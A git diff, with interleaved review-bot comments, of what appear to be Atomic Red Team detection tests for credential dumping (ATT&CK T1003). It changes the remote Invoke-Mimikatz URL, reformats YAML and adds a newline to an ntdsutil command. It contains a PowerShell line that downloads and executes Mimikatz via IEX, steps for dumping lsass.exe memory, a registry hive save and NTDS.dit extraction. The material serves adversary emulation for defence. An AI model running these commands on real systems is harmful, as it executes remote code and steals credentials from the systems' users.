diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 08ae0d1d..d95dfdcf 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -162,7 +162,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
+| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Run it with `powershell`!
```
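Review bot: the new default still points at a branch (`dev` on EmpireProject/Empire) rather than a tagged release or commit, so the script this test fetches and runs can change underneath it without any change to this repository; since the surrounding text already says the test works by invoking a remote mimikatz script, consider pinning the URL to a commit SHA (raw.githubusercontent.com accepts one in place of the branch name) so the test stays reproducible and reviewable.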
@@ -219,7 +219,7 @@ reg save HKLM\security security
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
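Review bot: this and the following T1003.md hunks are whitespace-only (a trailing space after "Sysinternals", "Windows Task", "right-clicking", "lsass.exe", "with", "capability" and "of" is removed), which is fine, but the change would be easier to review if these cleanups were split from the URL and command changes in the same commit.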
@@ -238,7 +238,7 @@ procdump.exe -accepteula -ma lsass.exe #{output_file}
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
-The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
@@ -246,11 +246,11 @@ Manager and administrative permissions.
#### Run it with these steps!
1. Open Task Manager:
- On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+ On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
- If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+ If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -261,7 +261,7 @@ Manager and administrative permissions.
## Atomic Test #7 - Offline Credential Theft With Mimikatz
-The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
@@ -287,8 +287,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
-The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
-uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 25dff4ff..a9068796 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -12,7 +12,7 @@ atomic_tests:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
- default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
+ default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
@@ -58,7 +58,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
description: |
- The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
@@ -74,7 +74,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
- The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
@@ -82,11 +82,11 @@ atomic_tests:
name: manual
steps: |
1. Open Task Manager:
- On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+ On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
- If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+ If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -95,7 +95,7 @@ atomic_tests:
- name: Offline Credential Theft With Mimikatz
description: |
- The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+ The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
@@ -118,8 +118,8 @@ atomic_tests:
- name: Dump Active Directory Database with NTDSUtil
description: |
- The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
- uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+ The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+ uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
@@ -131,4 +131,4 @@ atomic_tests:
executor:
name: command_prompt
command: |
- ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
\ No newline at end of file
+ ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
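Review bot: the command still uses typographic quotes (U+201C/U+201D) and the third argument `“create full #{output_folder}` has no closing quote at all; cmd.exe and ntdsutil only treat ASCII `"` as a quoting character, so the curly quotes are passed through literally and the intended three-command grouping is lost. Since this hunk only adds the missing trailing newline, suggest fixing the quoting in the same pass: `ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q`.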
diff --git a/atomics/index.yaml b/atomics/index.yaml
index a9fea2b5..efb0ed19 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -13445,7 +13445,7 @@ credential-access:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
- default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
+ default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
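Review bot: `IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'')` executes whatever the URL serves with no integrity check, so a push to the `dev` branch of the new default lands straight in this executor; for a test whose purpose is to exercise detection, pinning `remote_script` to a commit SHA (or comparing the downloaded content against a known hash before `IEX`) keeps the executed code reproducible.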
@@ -13492,9 +13492,9 @@ credential-access:
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
- description: "The memory of lsass.exe is often dumped for offline credential
- theft attacks. This can be achieved with Sysinternals \nProcDump. The tool
- may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.\n"
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
@@ -13508,25 +13508,28 @@ credential-access:
'
- name: Dump LSASS.exe Memory using Windows Task Manager
- description: "The memory of lsass.exe is often dumped for offline credential
- theft attacks. This can be achieved with the Windows Task \nManager and administrative
- permissions.\n"
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
+ Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
- steps: "1. Open Task Manager:\n On a Windows system this can be accomplished
- by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
- \n on the task bar and selecting \"Task Manager\".\n\n2. Select lsass.exe:\n
- \ If lsass.exe is not visible, select \"Show processes from all users\".
- This will allow you to observe execution of lsass.exe \n and select it
- for manipulation.\n\n3. Dump lsass.exe memory:\n Right-click on lsass.exe
- in Task Manager. Select \"Create Dump File\". The following dialog will
- show you the path to the saved file.\n"
+ steps: |
+ 1. Open Task Manager:
+ On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
+ on the task bar and selecting "Task Manager".
+
+ 2. Select lsass.exe:
+ If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
+ and select it for manipulation.
+
+ 3. Dump lsass.exe memory:
+ Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
- description: "The memory of lsass.exe is often dumped for offline credential
- theft attacks. Adversaries commonly perform this offline analysis with \nMimikatz.
- This tool is available at https://github.com/gentilkiwi/mimikatz.\n"
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
+ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
@@ -13546,11 +13549,10 @@ credential-access:
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
- description: "The Active Directory database NTDS.dit may be dumped using NTDSUtil
- for offline credential theft attacks. This capability \nuses the \"IFM\" or
- \"Install From Media\" backup functionality that allows Active Directory restoration
- or installation of \nsubsequent domain controllers without the need of network-based
- replication.\n"
+ description: |
+ The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
+ uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
+ subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
@@ -13560,7 +13562,9 @@ credential-access:
default: C:\Atomic_Red_Team
executor:
name: command_prompt
- command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q'
+ command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
+
+'
T1081:
technique:
id: attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c
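Review bot: the single-quoted scalar now spans three lines only to end the value with a newline; since this entry mirrors the `command: |` block scalar in T1003.yaml, emitting it as a block scalar here would be clearer than a quoted string with an embedded blank line. The typographic quotes and the unclosed `“create full #{output_folder}` argument are also carried over unchanged from T1003.yaml, so the quoting fix needs to land in both files.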